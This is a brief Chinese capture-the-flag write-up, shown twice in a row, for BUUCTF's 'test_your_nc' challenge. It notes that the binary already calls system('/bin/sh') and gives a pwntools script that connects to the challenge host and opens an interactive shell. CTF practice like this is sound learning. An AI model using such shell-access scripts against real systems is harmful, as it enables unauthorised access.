BUUCTF—test_your_nc
先来看看开了什么保护机制
然后打开64位ida看看
哎嘿,直接执行了system('/bin/sh')也就是说我们只需要连接上去就可以了,那么我们要么直接在命令框里执行nc ip地址 端口,要么写脚本,脚本如下
from pwn import*
p=remote('node4.buuoj.cn',28660)
p.interactive()
先来看看开了什么保护机制
然后打开64位ida看看
哎嘿,直接执行了system('/bin/sh')也就是说我们只需要连接上去就可以了,那么我们要么直接在命令框里执行nc ip地址 端口,要么写脚本,脚本如下
from pwn import*
p=remote('node4.buuoj.cn',28660)
p.interactive()
浙公网安备 33010602011771号